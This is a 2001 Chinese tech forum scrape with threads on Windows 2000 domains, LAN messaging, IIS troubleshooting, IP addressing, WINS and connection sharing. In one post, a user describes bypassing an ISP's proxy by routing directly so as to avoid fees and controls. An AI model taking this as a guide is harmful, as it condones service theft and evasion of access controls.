* 笑脸转换一点通

* html代码调试方法:


请问在局域网中设置域有什么好处？该如何设置？

计算机技术
请问在局域网中设置域有什么好处？该如何设置？

上一贴 | 下一贴
发表人 主题: 请问在局域网中设置域有什么好处？该如何设置？
audreys

终级用户
积分：658
发帖：175
来自：js.lyg
注册：2000-11-07
 发表于 2001-11-21 13:34:31 按此观看audreys的个人资料 按此发邮件给audreys 访问audreys的主页 audreys 的 oicq 是57659189,查看 57659189 的资料 收藏该主题供以后查看 发送悄悄话给audreys 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看audreys的IP
up!
谢谢

痛并傻笑着！
windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-11-21 20:11:19 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
增加管理功能，如果是NT的话登陆的时候可以限制很多。

Blueidea Web Team
Moderator Of multimedia forum
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-22 01:23:13 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
便于管理、安全性高
比如一个公司局域网（2000server＋2000pro），有很多工作站，你负责维护整个网络，而公司每个人都有可能使用每台工作站，不用域将是一场恶梦。你可以不给用户工作站本机权限，只给网络帐号，那么他不能自行安装任何软件，不能更改系统设置，而且有谁曾经“图谋不轨”的话绝对逃不过你的"火眼金睛"（骇客除外），如果你是administrator，你可以通过server做很多很多有趣的事

如果有兴趣，建议别学NT4，直接2000server（够你学个一年半载的）

等我想想再签
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-22 09:05:52 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
BIGBUG在上个帖子中说
引用:
直接2000server（够你学个一年半载的）

一般都要学些什么东西呢，能介绍一下吗，谢谢

缘是天定,份在人为.
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-22 10:57:29 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
TO：嘿嘿

server与pro的最大区别直观一点简单一点说，就是“管理工具”的不同，从控制面板中看，pro的管理工具有7项，而server有19项，最重要的就是“Active Directory”

如果你本身对2000pro很熟，那么管理工具的“Active Directory”就够你琢磨很长一段时间了，如果不熟那更长，但学习server必须有环境（局域网），不是每个人都有机会实践的，因为单机虽然可以装server，但你无法直观的了解它本身的功用

之所以别学NT4，是因为它实在太老了，应该进垃圾箱了（或者叫功成身退罢）

等我想想再签
糊锅巴

终级用户
积分：462
发帖：132
来自：北京
注册：2001-08-07
 发表于 2001-11-22 10:58:17 按此观看糊锅巴的个人资料 按此发邮件给糊锅巴 访问糊锅巴的主页 糊锅巴 的 oicq 是919288,查看 919288 的资料 发送悄悄话给糊锅巴 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看糊锅巴的IP
这样管理局域网上的用户比较方便。
可以限定他们能访问什么，不能访问什么。
安全性高很多。

我靠！
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-22 11:25:41 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
BIGBUG在上个帖子中说
引用:
TO：嘿嘿

server与pro的最大区别直观一点简单一点说，就是“管理工具”的不同，从控制面板中看，pro的管理工具有7项，而server有19项，最重要的就是“Active Directory”

如果你本身对2000pro很熟，那么管理工具的“Active Directory”就够你琢磨很长一段时间了，如果不熟那更长，但学习server必须有环境（局域网），不是每个人都有机会实践的，因为单机虽然可以装server，但你无法直观的了解它本身的功用

之所以别学NT4，是因为它实在太老了，应该进垃圾箱了（或者叫功成身退罢）

真的十分感谢，不过我现在在看linux,linux要学的很明确，就是五大管理：文件，设备，进程，网络（还有一个想不起来了，没看到那 [image] ）。我想弄清楚了原理再转看微软的应该不难

缘是天定,份在人为.
八神奄

超级用户
积分：304
发帖：102
来自：沈阳市
注册：2001-05-26
 发表于 2001-12-01 14:27:52 按此观看八神奄的个人资料 按此发邮件给八神奄 访问八神奄的主页 八神奄 的 oicq 是13730452,查看 13730452 的资料 发送悄悄话给八神奄 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看八神奄的IP
这个很好啊

那么 该如何去做呢

比如 我要去做一个什么样的2000版本呢 个人版 可以吗 一定要装服务器版吗？

客户机 可以是Win98吗 ？ 如果可以 具体些 好吗？

不一定哪一天， 我做了一件事 然后把自己吓了一跳。 呵呵 小坏蛋。。。
欢迎光临我的网站－＞ 一个年轻的不级格的程序员
Http://www.ioriwellings.tk
Http://www.iori.wellings.com
八神奄

超级用户
积分：304
发帖：102
来自：沈阳市
注册：2001-05-26
 发表于 2001-12-03 14:21:57 按此观看八神奄的个人资料 按此发邮件给八神奄 访问八神奄的主页 八神奄 的 oicq 是13730452,查看 13730452 的资料 发送悄悄话给八神奄 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看八神奄的IP
Up!

不一定哪一天， 我做了一件事 然后把自己吓了一跳。 呵呵 小坏蛋。。。
欢迎光临我的网站－＞ 一个年轻的不级格的程序员
Http://www.ioriwellings.tk
Http://www.iori.wellings.com
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-03 15:50:13 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
很久的帖子啦

服务器一定要server版
客户机可以是Win 9x、me、2000pro、xp home、xp pro或者ntworkstation等

建议2000server＋2000pro或xp pro

[这消息被BIGBUG编辑过(编辑时间2001-12-03 15:50:27)]

等我想想再签
上一贴 | 下一贴
快速回复 | 主题：请问在局域网中设置域有什么好处？该如何设置？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


斑竹，我的问题来了！

计算机技术
斑竹，我的问题来了！

上一贴 | 下一贴
发表人 主题: 斑竹，我的问题来了！
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-01 18:59:27 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 收藏该主题供以后查看 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
我经常受到局域网内部其他用户发来的消息，反映是windows自动弹出一个对话框，上面写着一段话，然后一个确定按钮。
我记得好像以前蓝色教过我知道对方ip，然后用windows的运行命名发送消息的，我忘记了，不置可否告知这个是什么命令？
还有一点，我在网络邻居看见对方的计算机，可是怎么才能知道它的ip呢？

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-01 19:07:38 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
问题二，我的iis不知道为什么变得无法启动了，即使卸载掉重装了iis，也还是无法启动！如何解决？我可不想重装win2k。

环境：win2k server+sp2

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

wjack

高级用户
积分：201
发帖：47
来自：上海
注册：2000-10-26
 发表于 2001-12-01 22:05:00 按此观看wjack的个人资料 按此发邮件给wjack 访问wjack的主页 wjack 的 oicq 是393382,查看 393382 的资料 发送悄悄话给wjack 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wjack的IP
记得两年前我用 win98 的时候，那个时候大家都不是用 qq 来通讯的，都是用win98自带的一个小程序叫 winpop 还是 winpopup 我现在也记不清楚了，打一段字，输入对方的IP或者计算机名就可以给他发消息了，要么再往前点，win32的时候，都是在dos下面用send这个命令发messager的，现在大家都用qq这种东西，早就把windows自带的这个小东西忘记了，win2000下面肯定也有这个winpop程序的，不是在winnt目录下面就是在system32目录下面，我也懒得去找，可以通讯的软件这么多，谁还用？？
查对方的IP还不简单吗？用ping命令阿：
ping [computername] 不就行了吗？
另外，要知道自己本机的详细IP情况，请使用：
ipconfig /all 这个命令
要是想知道自己本机的端口配置情况，请用：
netstat 这个命令，参数很多，具体的用 netstat /? 看看
你的IIS不能启动的问题麻，不好说，只能说最有可能的情况是，你运行了其他web服务程序，例如 apache tomcat weblogic 之类的，因为对外的 web 服务都是通过80端口实现的，谁先占谁先用，所以一定要查清是什么东西占用了80端口。

网站建设资源站，吐血推荐：
http://www.subdesigner.com
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-01 22:07:44 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
怎么实现给某个工作组（比如workgroup）下面所有的用户发消息？

除了iis没装别的，它就这么嚣张，气死我了。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-01 23:12:23 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
jack就是口水多，哗啦哗啦写那么多~~~
无忌，咱这哥们不丢份吧~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-12-01 23:35:01 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
张无忌在上个帖子中说
引用:
怎么实现给某个工作组（比如workgroup）下面所有的用户发消息？

除了iis没装别的，它就这么嚣张，气死我了。

winpopup是个windows自带的一个小工具软件。98就有了，以前在学校机房上机时就用过的。可以选择工作组。不知道win2000的升级了没有。
但是必须大家都运行了这个软件才能收到信息。

iis的问题我也碰到过，我是没有找到办法只好重装了系统。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2001-12-02 02:12:09 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
不知道有用么，看看再说~~~
http://www.52bj.com/bbs/NewsDetail.asp?id=309885

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

mmkk

我是谁
积分：7953
发帖：2352
来自：FJ,China
注册：2001-04-04
 发表于 2001-12-02 12:42:13 按此观看mmkk的个人资料 按此发邮件给mmkk mmkk 的 oicq 是35262348,查看 35262348 的资料 发送悄悄话给mmkk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mmkk的IP
darkvn在上个帖子中说
引用:
iis的问题我也碰到过，我是没有找到办法只好重装了系统。

我也是，找不到办法只好重装，而且是重装了两次才好的，晕啊！

本头像由诺婷提供^^！

高兴就好

naineo

终级用户
积分：486
发帖：202
来自：Shanghai,chi
注册：2001-02-26
 发表于 2001-12-02 13:30:53 按此观看naineo的个人资料 该用户不允许显示它的电子邮件 naineo 的 oicq 是585989,查看 585989 的资料 发送悄悄话给naineo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看naineo的IP
张无忌在上个帖子中说
引用:
我经常受到局域网内部其他用户发来的消息，反映是windows自动弹出一个对话框，上面写着一段话，然后一个确定按钮。
我记得好像以前蓝色教过我知道对方ip，然后用windows的运行命名发送消息的，我忘记了，不置可否告知这个是什么命令？
还有一点，我在网络邻居看见对方的计算机，可是怎么才能知道它的ip呢？

你收到的确定的对话框实际上是你的机器已成为别人远程控制软件的客户端（好听的说法）通俗的说就是你的计算机有了后门，别人可以用类似冰河的软件控制你计算机的一切，包括给你发这类消息，捕捉你的屏幕，开关机，等等..如果是在局域网内，那传输的速度可就真是很理想了.

who's eyes can be so private and so proud
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-02 13:47:08 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
naineo在上个帖子中说
引用:
张无忌在上个帖子中说
引用:
我经常受到局域网内部其他用户发来的消息，反映是windows自动弹出一个对话框，上面写着一段话，然后一个确定按钮。
我记得好像以前蓝色教过我知道对方ip，然后用windows的运行命名发送消息的，我忘记了，不置可否告知这个是什么命令？
还有一点，我在网络邻居看见对方的计算机，可是怎么才能知道它的ip呢？

你收到的确定的对话框实际上是你的机器已成为别人远程控制软件的客户端（好听的说法）通俗的说就是你的计算机有了后门，别人可以用类似冰河的软件控制你计算机的一切，包括给你发这类消息，捕捉你的屏幕，开关机，等等..如果是在局域网内，那传输的速度可就真是很理想了.

中木马？我坚信，没这个可能！

我检查过自己的端口，没发现什么异常的。
我的2k每个星期都去微软升级新的补丁，我不信就我们这破网里面有人可以突破我的2k。

上面说的直接发送消息，确实有这种功能的，不是木马。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

上一贴 | 下一贴
快速回复 | 主题：斑竹，我的问题来了！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


网络连接问题！~~~

计算机技术
网络连接问题！~~~

上一贴 | 下一贴
发表人 主题: 网络连接问题！~~~
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-19 23:01:55 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 收藏该主题供以后查看 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
我们公司的服务器是2000SERVER版本的，我的机器装的是WIN2K专业版本，我连了公司的局域网连的上工作组，就是在网络上看不到SERVER服务器以前都能看见的，而且我连其它机器的时候访问速度好慢呀~~~~~~~我能PING到服务器，也能PING到自己，就是不能上网！

这是为啥？？？？？？？？

^^
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-20 10:11:19 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
你应该加入“域”

另外，如果重装过系统，你插上网线后，进入系统，右键点击“我的电脑”——属性——网络标识——网络ID，顺着下去（有向导），前提是你必须有网络administrator权限

TMDwin2000博大精深，有时候古古怪怪，让人头痛不已

[这消息被BIGBUG编辑过(编辑时间2001-11-20 10:14:27)]
[这消息被BIGBUG编辑过(编辑时间2001-11-20 10:19:01)]

等我想想再签
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-20 11:48:10 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
BIGBUG在上个帖子中说
引用:
你应该加入“域”

另外，如果重装过系统，你插上网线后，进入系统，右键点击“我的电脑”——属性——网络标识——网络ID，顺着下去（有向导），前提是你必须有网络administrator权限

TMDwin2000博大精深，有时候古古怪怪，让人头痛不已

我们公司没搞域呀,只有工作组,我的问题解决了, [image] 问题出在网卡上~嘿嘿

^^
上一贴 | 下一贴
快速回复 | 主题：网络连接问题！~~~
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教一个关于局域网的问题！！！

计算机技术
请教一个关于局域网的问题！！！

上一贴 | 下一贴
发表人 主题: 请教一个关于局域网的问题！！！
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-11-16 17:35:45 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
一个局域网中各工作站的IP地址可以这样吗？

192.168.0.1 192.168.3.2 192.168.5.45

可以这样吗？？

？？？？？？？？？？？？？！！！！！！！！！！！！！！
bigboy

初级用户
积分：52
发帖：19
来自：
注册：2001-02-21
 发表于 2001-11-16 17:38:13 按此观看bigboy的个人资料 按此发邮件给bigboy 发送悄悄话给bigboy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bigboy的IP
你的网关和掩码要正确，保证他们一致！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-16 17:43:10 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
规范一点~

各个工作站 192.168.0.1 ~192.168.0.255 之间就行~
子网掩码 255.255.255.0

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-11-16 17:48:14 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
我看XP书上关于WINS配置，我看它WINS服务器的IP地址和局域网中工作站的IP好象不对劲，它的WINS服务器的IP地址是166.111.7.27，工作站的IP是166.111.172.111，请问这些IP是不是本地IP，谢谢！！！

？？？？？？？？？？？？？！！！！！！！！！！！！！！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-16 17:50:55 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
yixinguy78在上个帖子中说
引用:
我看XP书上关于WINS配置，我看它WINS服务器的IP地址和局域网中工作站的IP好象不对劲，它的WINS服务器的IP地址是166.111.7.27，工作站的IP是166.111.172.111，请问这些IP是不是本地IP，谢谢！！！

WINS服务器可以使跨越网段的微机间进行”网上邻居”式的访问。如果不同网段间的两台微机需要进行”网上邻居”式的访问，那么这两台微机均需要把各自的WINS服务器设置成指向提供的WINS服务的服务器

[这消息被yunbin编辑过(编辑时间2001-11-16 17:52:31)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

mao

现任版主
积分：1571
发帖：656
来自：北京
注册：2000-07-23
 发表于 2001-11-16 23:54:10 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
看了你的贴子我不知道你到底再问什么？
局域网的IP是可以随便设的（除保留的外）只不过在不同的网断，不过一般都用C类的就是以192开头的那种

[这消息被mao编辑过(编辑时间2001-11-16 23:53:42)]

解决问题才有进步
解决问题才有进步
randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-17 17:13:00 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
一个网段的，开头三位都得一样啊，192.168.0.x 这样就可以了。

always ran...
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-18 09:40:37 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
局域网IP分配不是随意的，比如你的192.168.0.X段，子网掩码是255.255.255.0，那么你可用的IP一般为192.168.0.1～192.168.0.254（注意：只有最后一段是可更改的，也就是说，你在这一段IP内至多可以配置254台机器）

如果你选用其他IP段，比如子网掩码为255.255.0.0或255.0.0.0，那么你可用IP就会多得多，局域网有特定的IP段，并不能由自己随意指定，建议找点资料看看

[这消息被BIGBUG编辑过(编辑时间2001-11-18 09:45:36)]

等我想想再签
上一贴 | 下一贴
快速回复 | 主题：请教一个关于局域网的问题！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


ip地址

计算机技术
ip地址

上一贴 | 下一贴
发表人 | 主题: ip地址
jet 我心飞翔 现任版主 积分：5452 发帖：1681 来自：Xi`an 注册：2000-06-18 | 发表于 2001-11-03 03:05:11 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 收藏该主题供以后查看 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP 局域网里10.173.XXX.XXX和10.168.XXX.XXX已经192.XXX.XXX.XXX有什么区别？ Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
jet 我心飞翔 现任版主 积分：5452 发帖：1681 来自：Xi`an 注册：2000-06-18 | 发表于 2001-11-03 03:13:56 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP 我把整个过程讲一下吧，事情是这样的： 我住的地方是fddi形式的光纤接入上网方式，客户端要安装MS的代理软件，登陆某个有权限的域才能访问出去。(内部ip分配为10.173.X.X)于是我就想，如果我直接走路由，不过代理(ip可以指定为10.168.X.X，路由ip为10.168.0.1)，不但速度可以提高，也可以不受他们的管制（不交网费），最最关键的是，可以和附近网吧里的朋友玩游戏。想法得到了实现，但是很快也被他们发现。于是他们将我们和网吧的机器分开了，从此无法和网吧的机器进行ip/ipx协议的通讯，但是网络邻居到是可以访问，不知道他们是怎么弄的，在此想大家请教，谢谢 Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-11-03 10:46:31 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 呵呵，就是做成几个VLAN，在路由器端分配权限。使几个VLAN之间只能进行某一方面的通讯，这样做可以减少广播风暴对网络的冲击，而且方便管理，安全性更高。要修改这个设置，只能登陆到路由端，进行设定。 我想是这个原理吧，我当初上Cisco的课的时候就是这么做的实验，但是没有测试IP/IPX协议的通讯。 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
DayinNightout 超级用户 积分：338 发帖：150 来自：CCF 注册：2000-12-18 | 发表于 2001-11-03 19:56:55 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP 所以fttb就是这点不好 木有签名#@$%
jet 我心飞翔 现任版主 积分：5452 发帖：1681 来自：Xi`an 注册：2000-06-18 | 发表于 2001-11-06 04:32:33 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP 谢谢hellslayer 我让Admin把ipx打开就可以GAME了 Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-11-06 14:26:45 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
上一贴 | 下一贴
快速回复 | 主题：ip地址
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于win2k共享上网

计算机技术
关于win2k共享上网

上一贴 | 下一贴
发表人 主题: 关于win2k共享上网
茕若

姑妄言
积分：1110
发帖：496
来自：沈阳,辽宁,中国
注册：2000-12-30
 发表于 2001-11-08 00:15:38 按此观看茕若的个人资料 按此发邮件给茕若 访问茕若的主页 茕若 的 oicq 是19014396,查看 19014396 的资料 收藏该主题供以后查看 发送悄悄话给茕若 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看茕若的IP
现在两台机器，一台安装win98se2 一台安装win2k 两台连成局域网，
现在不想使用共享上网的软件
这俩台机器如何共享上网？

对不起 ：（ 生活的痛苦远远超过了欢乐的程度
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-08 00:24:34 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
谁做主机均可，使用internet共享连接，按照提示设定就行了；

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
茕若

姑妄言
积分：1110
发帖：496
来自：沈阳,辽宁,中国
注册：2000-12-30
 发表于 2001-11-08 00:26:28 按此观看茕若的个人资料 按此发邮件给茕若 访问茕若的主页 茕若 的 oicq 是19014396,查看 19014396 的资料 发送悄悄话给茕若 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看茕若的IP
能不能说具体点 阿

